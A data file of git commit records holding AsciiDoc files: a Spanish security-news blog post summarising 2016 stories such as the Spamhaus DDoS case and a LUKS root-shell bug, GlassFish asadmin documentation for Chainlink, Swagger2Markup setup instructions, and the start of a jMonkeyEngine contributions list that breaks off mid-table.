2016-11-16-Hacking-Daily-News-161116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-16-Hacking-Daily-News-161116.adoc","new_file":"_posts\/2016-11-16-Hacking-Daily-News-161116.adoc","new_contents":"= Hacking Daily News (16\/11\/16)\n\nimage::DDoSortreat.jpeg[500,300] \n\nNOTE: -Acusado del DDos contra Spamhaus no ir\u00e1 a prisi\u00f3n +\n-Google toma posiciones en el nuevo mundo Trump +\n-Linux owneado apretando Enter descubren valencianos +\n-Twitter permite al FBI espionaje en tiempo real +\n-El micro de MacOS sigue grabando sin avisar +\n\n\n* *El acusado del DDoS contra Spamhaus no pasar\u00e1 ni un d\u00eda en prisi\u00f3n* +\nFueron los ataques DDoS m\u00e1s fuertes del momento, en 2013, con picos de m\u00e1s de 300 Gbps que consiguieron ralentizar Internet. El hacker holand\u00e9s Sven Olaf Kamphuis fue detenido en Barcelona acusado de participar en ellos y estuvo 55 d\u00edas en prisi\u00f3n mientras esperaba la extradici\u00f3n a su pa\u00eds. Ahora un juez dice que con estos d\u00edas en prisi\u00f3n ya ha tenido suficiente y no deber\u00e1 pasar ni uno m\u00e1s. En julio de 2015 otro joven fue detenido, en Gran Breta\u00f1a, acusado del mismo ataque. Seth Nolan Mcdonagh ha sido sentenciado a 240 horas de trabajo comunitario. Y as\u00ed se cierran las consecuencias para los posibles responsables de uno de los ataques m\u00e1s fuertes contra toda la red. \nhttp:\/\/securityaffairs.co\/wordpress\/53473\/cyber-crime\/spamhaus-attack.html\n\n* *Google toma posiciones en la Federal Trade Comission de transici\u00f3n a Trump* +\nNo parece costarle demasiado a Google virar hacia Trump, asegura un art\u00edculo en \"The Intercept\". Joshua Wright ser\u00e1 el encargado de hacer las tareas de lobby para Google en la FTC. Por otra parte, The New York Times publica una larga carta de Julian Assange titulada \"The Banality of \u2018Don\u2019t Be Evil\u2019\" en la que acusa a Eric Schmidt y Jared Cohen de haber asesinado la privacidad y conducir al mundo hacia el autoritarismo. Como no nos gusta tener que dar nuestros datos a The New York Times para leer sus noticias (y no entendemos qu\u00e9 hace Assange publicando cosas sobre privacidad all\u00ed), os dejamos mejor el resumen del tema que ha hecho Michael Moore en su Facebook (otro que tal baila).\nhttps:\/\/theintercept.com\/2016\/11\/15\/google-gets-a-seat-on-the-trump-transition-team\/\nhttps:\/\/www.facebook.com\/mmflint\/posts\/366514833450574\n\n* *Linux puede ser owneado s\u00f3lo con apretar 70 segundos la tecla Enter* +\nLo han descubierto dos investigadores muy ligados a la Universitat Polit\u00e8cnica de Val\u00e8ncia y a estas horas la noticia corre como p\u00f3lvora por toda Internet. H\u00e9ctor Marco e Ismael Ripoll han descubierto esta vulnerabilidad que permite a un atacante conseguir shell de root en initramfs al apretar durante 70 segundos la tecla Enter. Esto se debe a un bug en Linux Unified Key Setup (LUKS) y permite atacar m\u00e1quinas Linux con cifrado. \nhttp:\/\/www.theregister.co.uk\/2016\/11\/16\/want_to_pop_linux_shell_hole_enter_for_a_minute\/\n\n* *Twitter pone en manos del FBI una herramienta para espionaje en tiempo real* +\nTwitter ha puesto en manos del FBI una herramienta de espionaje avanzado en tiempo real que usar\u00e1, en principio, sobre 200 cuentas de Twitter investigadas por la polic\u00eda, supuestamente pertenecientes a \"terroristas\" y \"criminales\". La herramienta permite hacer b\u00fasquedas en conversaciones p\u00fablicas (suponemos) de Twitter en pr\u00e1cticamente tiempo real y con filtros personalizables. \nhttp:\/\/www.theverge.com\/2016\/11\/14\/13629248\/fbi-dataminr-twitter-surveillance-contract-scanning-police\n\n* *De c\u00f3mo Shazam, el micro interno de MacOS, te sigue grabando aunque dejes de grabar* +\nInvestigaci\u00f3n realizada por Patrick Warkle durante un viaje a la Ekoparty.\nhttps:\/\/objective-see.com\/blog\/blog_0x13.html\n\n","old_contents":"= Hacking Daily News (16\/11\/16)\n\nimage::DDoSortreat.jpeg[500,300] \n\nNOTE: -Acusado del DDos contra Spamhaus no ir\u00e1 a prisi\u00f3n +\n-Google toma posiciones en el nuevo mundo Trump +\n-Linux owneado apretando Enter +\n-Twitter permite espionaje en tiempo real al FBI +\n-El micro de MacOS sigue grabando sin avisar +\n\n\n* *El acusado del DDoS contra Spamhaus no pasar\u00e1 ni un d\u00eda en prisi\u00f3n* +\nFueron los ataques DDoS m\u00e1s fuertes del momento, en 2013, con picos de m\u00e1s de 300 Gbps que consiguieron ralentizar Internet. El hacker holand\u00e9s Sven Olaf Kamphuis fue detenido en Barcelona acusado de participar en ellos y estuvo 55 d\u00edas en prisi\u00f3n mientras esperaba la extradici\u00f3n a su pa\u00eds. Ahora un juez dice que con estos d\u00edas en prisi\u00f3n ya ha tenido suficiente y no deber\u00e1 pasar ni uno m\u00e1s. En julio de 2015 otro joven fue detenido, en Gran Breta\u00f1a, acusado del mismo ataque. Seth Nolan Mcdonagh ha sido sentenciado a 240 horas de trabajo comunitario. Y as\u00ed se cierran las consecuencias para los posibles responsables de uno de los ataques m\u00e1s fuertes contra toda la red. \nhttp:\/\/securityaffairs.co\/wordpress\/53473\/cyber-crime\/spamhaus-attack.html\n\n* *Google toma posiciones en la Federal Trade Comission de transici\u00f3n a Trump* +\nNo parece costarle demasiado a Google virar hacia Trump, asegura un art\u00edculo en \"The Intercept\". Joshua Wright ser\u00e1 el encargado de hacer las tareas de lobby para Google en la FTC. Por otra parte, The New York Times publica una larga carta de Julian Assange titulada \"The Banality of \u2018Don\u2019t Be Evil\u2019\" en la que acusa a Eric Schmidt y Jared Cohen de haber asesinado la privacidad y conducir al mundo hacia el autoritarismo. Como no nos gusta tener que dar nuestros datos a The New York Times para leer sus noticias (y no entendemos qu\u00e9 hace Assange publicando cosas sobre privacidad all\u00ed), os dejamos mejor el resumen del tema que ha hecho Michael Moore en su Facebook (otro que tal baila).\nhttps:\/\/theintercept.com\/2016\/11\/15\/google-gets-a-seat-on-the-trump-transition-team\/\nhttps:\/\/www.facebook.com\/mmflint\/posts\/366514833450574\n\n* *Linux puede ser owneado s\u00f3lo con apretar 70 segundos la tecla Enter* +\nLo han descubierto dos investigadores muy ligados a la Universitat Polit\u00e8cnica de Val\u00e8ncia y a estas horas la noticia corre como p\u00f3lvora por toda Internet. H\u00e9ctor Marco e Ismael Ripoll han descubierto esta vulnerabilidad que permite a un atacante conseguir shell de root en initramfs al apretar durante 70 segundos la tecla Enter. Esto se debe a un bug en Linux Unified Key Setup (LUKS) y permite atacar m\u00e1quinas Linux con cifrado. \nhttp:\/\/www.theregister.co.uk\/2016\/11\/16\/want_to_pop_linux_shell_hole_enter_for_a_minute\/\n\n* *Twitter pone en manos del FBI una herramienta para espionaje en tiempo real* +\nTwitter ha puesto en manos del FBI una herramienta de espionaje avanzado en tiempo real que usar\u00e1, en principio, sobre 200 cuentas de Twitter investigadas por la polic\u00eda, supuestamente pertenecientes a \"terroristas\" y \"criminales\". La herramienta permite hacer b\u00fasquedas en conversaciones p\u00fablicas (suponemos) de Twitter en pr\u00e1cticamente tiempo real y con filtros personalizables. \nhttp:\/\/www.theverge.com\/2016\/11\/14\/13629248\/fbi-dataminr-twitter-surveillance-contract-scanning-police\n\n* *De c\u00f3mo Shazam, el micro interno de MacOS, te sigue grabando aunque dejes de grabar* +\nInvestigaci\u00f3n realizada por Patrick Warkle durante un viaje a la Ekoparty.\nhttps:\/\/objective-see.com\/blog\/blog_0x13.html\n\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"7ca20fc023c81abc73cfa49a596940ad7a1ef9dc","subject":"Clean up Glassfish administration docs.","message":"Clean up Glassfish administration docs.\n","repos":"BrentDouglas\/chainlink,BrentDouglas\/chainlink","old_file":"doc\/src\/main\/asciidoc\/administration-glassfish.adoc","new_file":"doc\/src\/main\/asciidoc\/administration-glassfish.adoc","new_contents":"=== GlassFish\n\n==== Using `asadmin`\n\nThe following `asadmin` commands are provided for Glassfish:\n\n- get-chainlink\n- get-chainlink-job-operator -j <job operator name>\n- get-chainlink-deployment -d <deployment name>\n- get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- set-chainlink [ -f <filename> | -b <base 64 of file> ]\n- set-chainlink-job-operator [ -f <filename> | -b <base 64 of file> ]\n- set-chainlink-deployment [ -f <filename> | -b <base 64 of file> ]\n- set-chainlink-deployment-job-operator -d <deployment name> [ -f <filename> | -b <base 64 of file> ]\n- delete-chainlink\n- delete-chainlink-job-operator -j <job operator name>\n- delete-chainlink-deployment -d <deployment name>\n- delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- reload-chainlink\n\n[NOTE]\n====\nThe output of the `get-chainlink-*` commands are not formatted. To make it easier to read you might\nconsider using them with the `asadmin` terse option (`-t` or `--terse`) and combining them with an xml\nformatter. e.g.\n\n`.\/asadmin -t get-chainlink | xmllint --format -`\n====\n\nThe options for the commands all function mor or less the same across commands. Here is a quick\nreference, though they are elaborated on per command.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element the command is to be applied to.\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that either the command is to be applied to or that\ncontains the `job-operator` element the command is to be applied to.\n|`-f \\| --file`\n|The filename of a file containing the xml snippet to be applied to the model.\n|`-b \\| --base64`\n|A base64 encoded string ot the xml snippet to be applied to the model.\n|===\n\n\n[TIP]\n====\nThe recommended way of updating Chainlink's configuration is to retrieve the existing configuration,\nmodify it, and then upload the modifications. e.g. To change the whole server config:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink -f ~\/config.xml\n----\n\nOr just a single operator:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink-deployment-job-operator -d default -j default | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink-deployment-job-operator -d default -j default -f ~\/config.xml\n----\n====\n\n===== get-chainlink\n\nReturn the entire Chainlink subsystem configuration. This command should never fail. The output is\nxml from the schema `chainlink-subsystem_1_0.xsd`.\n\n===== get-chainlink-job-operator -j <job operator name>\n\nReturn the configuration from a single named `job-operator` element. The output is an xml snippet xml\nof a `job-operator` element from the schema `chainlink_1_0.xsd`. This command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be retrieved. The element must\nbe a child of the `subsystem` element in the schema.\n|===\n\n===== get-chainlink-deployment -d <deployment name>\n\nReturn the configuration from a single named `deployment` element. The output is an xml snippet xml of\na `deployment` element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. The `deployment` parameter is not provided.\n2. The named `deployment` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element to be retrieved.\n|===\n\n===== get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nReturn the configuration from a single named `job-operator` element from a named `deployment` element. The\noutput is an xml snippet xml of a `job-operator` element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named `deployment` element does not exist.\n3. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that contains the `job-operator`\nelement.\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be retrieved. The element must\nbe a child of the `deployment` element in the schema.\n|===\n\n===== set-chainlink [ -f <filename> | -b <base 64 of file> ]\n\nSet Chainlink's configuration to match that of the provided xml. This command is an 'upsert'. The\ncommand will fail if:\n\n1. Neither of the arguments `file` or `base64` are provided.\n2. Both of the arguments `file` or `base64` are provided.\n3. The xml content provided is not valid according to the schema `chainlink-subsystem_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== set-chainlink-job-operator [ -f <filename> | -b <base 64 of file> ]\n\nSet a named `job-operator` element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` are provided.\n2. Both of the arguments `file` or `base64` are provided.\n3. The xml content provided is not a valid snipped of the `job-operator` element in the schema\n `chainlink_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== set-chainlink-deployment [ -f <filename> | -b <base 64 of file> ]\n\nSet a named `deployment` element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` are provided.\n2. Both of the arguments `file` or `base64` are provided.\n3. The xml content provided is not a valid snipped of the `deployment` element in the schema\n `chainlink_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== set-chainlink-deployment-job-operator -d <deployment name> [ -f <filename> | -b <base 64 of file> ]\n\nSet a named `job-operator` element from a named `deployment` element to match that of the provided\nxml. This command is an 'upsert'. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n3. Neither of the arguments `file` or `base64` are provided.\n4. Both of the arguments `file` or `base64` are provided.\n5. The xml content provided is not a valid snipped of the `job-operator` element in the schema\n `chainlink_1_0.xsd`.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that contains\/will contain the\n `job-operator` element.\n|`-f \\| --file`\n|The filename of a file containing the xml model.\n|`-b \\| --base64`\n|A base64 encoded string of the xml model.\n|===\n\n===== delete-chainlink\n\nRemove all Chainlink configuration. This command will always succeed. This command will return the\nexisting configuration as per the `get-chainlink` command.\n\n===== delete-chainlink-job-operator -j <job operator name>\n\nRemove a single named `job-operator` element. This command will return the existing configuration\nas per the `get-chainlink-job-operator` command. This command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be removed. The element must\n be a child of the `subsystem` element in the schema.\n|===\n\n===== delete-chainlink-deployment -d <deployment name>\n\nRemove a single named `deployment` element. This command will return the existing configuration as\nper the `get-chainlink-deployment` command. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element to be removed.\n|===\n\n===== delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nRemove a single `job-operator` element contained in a named `deployment` element. This command will\nreturn the existing configuration as per the `get-chainlink-deployment-job-operator` command. This\ncommand will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named `deployment` element does not exist.\n3. The named `job-operator` element does not exist.\n\n[cols=\"1,3\"]\n|===\n|Flag |Parameter\n|`-d \\| --deployment`\n|The name attribute of the `deployment` element that contains the `job-operator`\n element.\n|`-j \\| --job-operator`\n|The name attribute of the `job-operator` element to be removed. The element must\n be a child of the `deployment` element in the schema.\n|===\n\n===== reload-chainlink\n\nApply the configuration changes to the Chainlink runtime.\n\n[TIP]\n====\nAccidentally call `delete-chainlink`? The existing configuration is returned so you can save it to a\nfile and then upload it again with `set-chainlink`. Remember, configuration changes are not visible to\nChainlink until `reload-chainlink` is called.\n====","old_contents":"=== GlassFish\n\n==== Using `asadmin`\n\nThe following asadmin commands are provided for Glassfish:\n\n- get-chainlink\n- get-chainlink-job-operator -j <job operator name>\n- get-chainlink-deployment -d <deployment name>\n- get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- set-chainlink [ -f <file> | -b <base 64 of file> ]\n- set-chainlink-job-operator [ -f <file> | -b <base 64 of file> ]\n- set-chainlink-deployment [ -f <file> | -b <base 64 of file> ]\n- set-chainlink-deployment-job-operator -d <deployment name> [ -f <file> | -b <base 64 of file> ]\n- delete-chainlink\n- delete-chainlink-job-operator -j <job operator name>\n- delete-chainlink-deployment -d <deployment name>\n- delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n- reload-chainlink\n\n[NOTE]\n====\nThe output of the `get-chainlink-*` commands are not formatted. To make it easier to read you might\nconsider using them with asadmin's terse (-t or --terse) options and combining them with an xml\nformatter. e.g.\n\n`.\/asadmin -t get-chainlink | xmllint --format -`\n====\n\nThe options for the commands all function mor or less the same across commands. Here is a quick\nreference, though they are elaborated on per command.\n\n-j|--job-operator The name attribute of the job-operator element the command is to be applied to\n-d|--deployment The name attribute of the deployment element the command is to be applied to\n-f|--file The filename of a file containing the xml snippet to be applied to the model\n-b|--base64 A base64 encoded string ot the xml snippet to be applied to the model\n\n\n[TIP]\n====\nThe recommended way of updating chainlink's configuration is to retrieve the existing configuration,\nmodify it, and then upload the modifications. e.g. To change the whole server config:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink -f ~\/config.xml\n----\n\nOr just a single operator:\n\n[source,shell]\n----\n.\/asadmin -t get-chainlink-deployment-job-operator -d default -j default | xmllint --format - > ~\/config.xml\nvim ~\/config.xml # Make changes here\n.\/asadmin set-chainlink-deployment-job-operator -d default -j default -f ~\/config.xml\n----\n====\n\n===== get-chainlink\n\nPrints the entire Chainlink subsystem configuration. This command should never fail. The output is\nxml from the schema `chainlink-subsystem_1_0.xsd`.\n\n===== get-chainlink-job-operator -j <job operator name>\n\nPrint the configuration from a single named job-operator element. The output is an xml snippet xml\nof a job-operator element from the schema `chainlink_1_0.xsd`.\nThis command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named job-operator element does not exist.\n\n-j|--job-operator The name attribute of the job-operator element to be retrieved. The element must\n be a child of the subsystem element in the schema.\n\n===== get-chainlink-deployment -d <deployment name>\n\nPrint the configuration from a single named deployment element. The output is an xml snippet xml of\na deployment element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. The `deployment` parameter is not provided.\n2. The named deployment element does not exist.\n\n-d|--deployment The name attribute of the deployment element to be retrieved.\n\n===== get-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nPrint the configuration from a single named job-operator element from a named deployment. The\noutput is an xml snippet xml of a job-operator element from the schema `chainlink_1_0.xsd`.\n\nThis command will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named deployment element does not exist.\n3. The named job-operator element does not exist.\n\n-d|--deployment The name attribute of the deployment element that contains the job-operator\n element.\n-j|--job-operator The name attribute of the job-operator element to be retrieved. The element must\n be a child of the deployment element in the schema.\n\n===== set-chainlink [ -f <file> | -b <base 64 of file> ]\n\nSet Chainlink's configuration to match that of the provided xml. This command is an 'upsert'. The\ncommand will fail if:\n\n1. Neither of the arguments `file` or `base64` are be provided\n2. Both of the arguments `file` or `base64` are be provided\n3. The xml content provided is not valid according to the schema `chainlink-subsystem_1_0.xsd`\n\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== set-chainlink-job-operator [ -f <file> | -b <base 64 of file> ]\n\nSet a named job-operator element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` are be provided\n2. Both of the arguments `file` or `base64` are be provided\n3. The xml content provided is not a valid snipped of the job-operator element in the schema\n `chainlink_1_0.xsd`\n\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== set-chainlink-deployment [ -f <file> | -b <base 64 of file> ]\n\nSet a named deployment element to match that of the provided xml. This command is an 'upsert'.\nThe command will fail if:\n\n1. Neither of the arguments `file` or `base64` are be provided\n2. Both of the arguments `file` or `base64` are be provided\n3. The xml content provided is not a valid snipped of the deployment element in the schema\n `chainlink_1_0.xsd`\n\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== set-chainlink-deployment-job-operator -d <deployment name> [ -f <file> | -b <base 64 of file> ]\n\nSet a named job-operator element from a named deployment element to match that of the provided\nxml. This command is an 'upsert'. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n3. Neither of the arguments `file` or `base64` are be provided\n4. Both of the arguments `file` or `base64` are be provided\n5. The xml content provided is not a valid snipped of the job-operator element in the schema\n `chainlink_1_0.xsd`\n\n-d|--deployment The name attribute of the deployment element that contains\/will contain the\n job-operator element.\n-f|--file The filename of a file containing the xml model.\n-b|--base64 A base64 encoded string of the xml model.\n\n===== delete-chainlink\n\nRemove all Chainlink configuration. This command will always succeed. This command will return the\nexisting configuration as per the get-chainlink command.\n\n===== delete-chainlink-job-operator -j <job operator name>\n\nRemove a single named job-operator element. This command will return the existing configuration\nas per the get-chainlink-job-operator command. This command will fail if:\n\n1. The `job-operator` parameter is not provided.\n2. The named job-operator element does not exist.\n\n-j|--job-operator The name attribute of the job-operator element to be removed. The element must\n be a child of the subsystem element in the schema.\n\n===== delete-chainlink-deployment -d <deployment name>\n\nRemove a single named deployment element. This command will return the existing configuration as\nper the get-chainlink-deployment command. The command will fail if:\n\n1. The `deployment` argument is not provided.\n2. The named `deployment` element does not exist.\n\n-d|--deployment The name attribute of the deployment element to be removed.\n\n===== delete-chainlink-deployment-job-operator -d <deployment name> -j <job operator name>\n\nRemove a single job-operator element contained in a named deployment element. This command will\nreturn the existing configuration as per the get-chainlink-deployment-job-operator command. This\ncommand will fail if:\n\n1. Either the `deployment` or `job-operator` parameter is not provided.\n2. The named deployment element does not exist.\n3. The named job-operator element does not exist.\n\n-d|--deployment The name attribute of the deployment element that contains the job-operator\n element.\n-j|--job-operator The name attribute of the job-operator element to be removed. The element must\n be a child of the deployment element in the schema.\n\n===== reload-chainlink\n\nApply the configuration changes to the Chainlink runtime.\n\n[TIP]\n====\nAccidentally call delete-chainlink? The existing configuration is returned so you can save it to a\nfile and then upload it again with set-chainlink. Remember configuration changes are not visible to\nChainlink until reload-chainlink is called.\n====","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f7fe2b0cca4613c394cbe815ee5f637230b1c1ba","subject":"renamed jCenter() repository to jcenter()","message":"renamed jCenter() repository to jcenter()","repos":"Swagger2Markup\/swagger2markup","old_file":"swagger2markup-documentation\/src\/docs\/asciidoc\/getting_started.adoc","new_file":"swagger2markup-documentation\/src\/docs\/asciidoc\/getting_started.adoc","new_contents":"== Getting started\n\nSwagger2Markup is a standard .jar file. To start using it, you need to add the library to your project\u2019s classpath. Swagger2Markup is published in JCenter and Maven Central. The artifacts can be viewed at the following locations:\n\n* Releases: https:\/\/jcenter.bintray.com\/io\/github\/swagger2markup\/swagger2markup\/\n\n* Snapshots: https:\/\/oss.jfrog.org\/simple\/oss-snapshot-local\/io\/github\/swagger2markup\/swagger2markup\/\n \nIf you use Gradle or Maven, you can include Swagger2Markup as follows.\n\nWARNING: The *groupId* has been changed from *io.github.robwin* to *io.github.swagger2markup*\n\n=== Gradle\n\n==== Release\n[source,groovy, subs=\"attributes\"]\n----\nrepositories {\n jcenter()\n}\n\ncompile \"io.github.swagger2markup:swagger2markup:{release-version}\"\n----\n\n==== Snapshot\n\n[source,groovy]\n----\nrepositories {\n maven { url 'http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/' }\n}\n----\n\n=== Maven\n==== Release\n\n[source,xml, subs=\"specialcharacters,attributes\"]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>jcenter-releases<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.swagger2markup<\/groupId>\n <artifactId>swagger2markup<\/artifactId>\n <version>{release-version}<\/version>\n<\/dependency>\n----\n\n==== Snapshot\n\n[source,java]\n----\n<repositories>\n <repository>\n <id>jcenter-snapshots<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n\n","old_contents":"== Getting started\n\nSwagger2Markup is a standard .jar file. To start using it, you need to add the library to your project\u2019s classpath. Swagger2Markup is published in JCenter and Maven Central. The artifacts can be viewed at the following locations:\n\n* Releases: https:\/\/jcenter.bintray.com\/io\/github\/swagger2markup\/swagger2markup\/\n\n* Snapshots: https:\/\/oss.jfrog.org\/simple\/oss-snapshot-local\/io\/github\/swagger2markup\/swagger2markup\/\n \nIf you use Gradle or Maven, you can include Swagger2Markup as follows.\n\nWARNING: The *groupId* has been changed from *io.github.robwin* to *io.github.swagger2markup*\n\n=== Gradle\n\n==== Release\n[source,groovy, subs=\"attributes\"]\n----\nrepositories {\n jCenter()\n}\n\ncompile \"io.github.swagger2markup:swagger2markup:{release-version}\"\n----\n\n==== Snapshot\n\n[source,groovy]\n----\nrepositories {\n maven { url 'http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/' }\n}\n----\n\n=== Maven\n==== Release\n\n[source,xml, subs=\"specialcharacters,attributes\"]\n----\n<repositories>\n <repository>\n <snapshots>\n <enabled>false<\/enabled>\n <\/snapshots>\n <id>jcenter-releases<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/jcenter.bintray.com<\/url>\n <\/repository>\n<\/repositories>\n\n<dependency>\n <groupId>io.github.swagger2markup<\/groupId>\n <artifactId>swagger2markup<\/artifactId>\n <version>{release-version}<\/version>\n<\/dependency>\n----\n\n==== Snapshot\n\n[source,java]\n----\n<repositories>\n <repository>\n <id>jcenter-snapshots<\/id>\n <name>jcenter<\/name>\n <url>http:\/\/oss.jfrog.org\/artifactory\/oss-snapshot-local\/<\/url>\n <\/repository>\n<\/repositories>\n----\n\n\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c36a25235869ebfe69e7c7b585b5ffbb76a62cb6","subject":"fix attribute address for wiki url","message":"fix attribute address for wiki url\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/contributions\/pages\/contributions.adoc","new_file":"docs\/modules\/contributions\/pages\/contributions.adoc","new_contents":"= Contributions\n:revnumber: 2.0\n:revdate: 2020\/07\/11\n:url-contribs: https:\/\/github.com\/jMonkeyEngine-Contributions\n:url-core: https:\/\/hub.jmonkeyengine.org\/badges\/103\/core-developer\n:url-enginelib: https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/tree\/master\n:url-forum-user: https:\/\/hub.jmonkeyengine.org\/u\n:url-github: https:\/\/github.com\n:url-jitpack: https:\/\/jitpack.io\n:url-mcentral: https:\/\/search.maven.org\/search?\n:url-mirrors: https:\/\/github.com\/jMonkeyEngine-mirrors\n:url-wiki: https:\/\/wiki.jmonkeyengine.org\n\nThe following list contains additional content for jMonkeyEngine 3 contributed by users. They are, as is the engine itself, open-source - Feel free to download and use them for your projects. :)\n\n\n[TIP]\n====\nTo install a jMonkeyEngine SDK plugin, go to `menu:Tools[Plugins>Available Plugins]`. +\n(Currently only jME 3.0 stable SDK, jME 3.1+ does not yet support plugins)\n====\n\n\n== Libraries with Maven coordinates\n\nJMonkeyEngine projects built using https:\/\/gradle.org\/[Gradle]\nor https:\/\/maven.apache.org\/[Maven]\ncan easily incorporate pre-built libraries from public Maven repositories.\n\n\"GroupID:ArtifactID\" entries link to package information;\nfollow these links to determine the version ID of the latest release.\n\"Name\" entries link to relevant documentation, if any.\n\n[cols=\"20,20,15,35,10\",grid=\"none\",options=\"header\"]\n|===\n|Name\n|Purpose\n|Maintainer(s)\n|Maven repository URL +\n GroupID:ArtifactID\n|Source code\n\n|https:\/\/1337atr.weebly.com\/jttf.html[jME-TTF]\n|Render TrueType fonts\n|(none)\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme-ttf[com.github.stephengold:jme-ttf]\n|{url-github}\/ATryder\/jME-TTF[GitHub]\n\n\n|{url-github}\/stephengold\/Heart#readme[Heart]\n|General-purpose toolkit\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:Heart[com.github.stephengold:Heart]\n|{url-github}\/stephengold\/Heart[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-nifty]\n|Graphical user interface\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n {url-mcentral}q=g:com.github.stephengold%20AND%20a:jme3-utilities-nifty[com.github.stephengold:jme3-utilities-nifty]\n|{url-github}\/stephengold\/jme3-utilities\/tree\/master\/nifty[GitHub]\n\n|{url-github}\/stephengold\/jme3-utilities#readme[Jme3-utilities-ui]\n|Modal hotkeys and help screens\n|{url-forum-user}\/sgold[sgold]\n|\\https:\/\/repo1.maven.org\/maven2 +\n 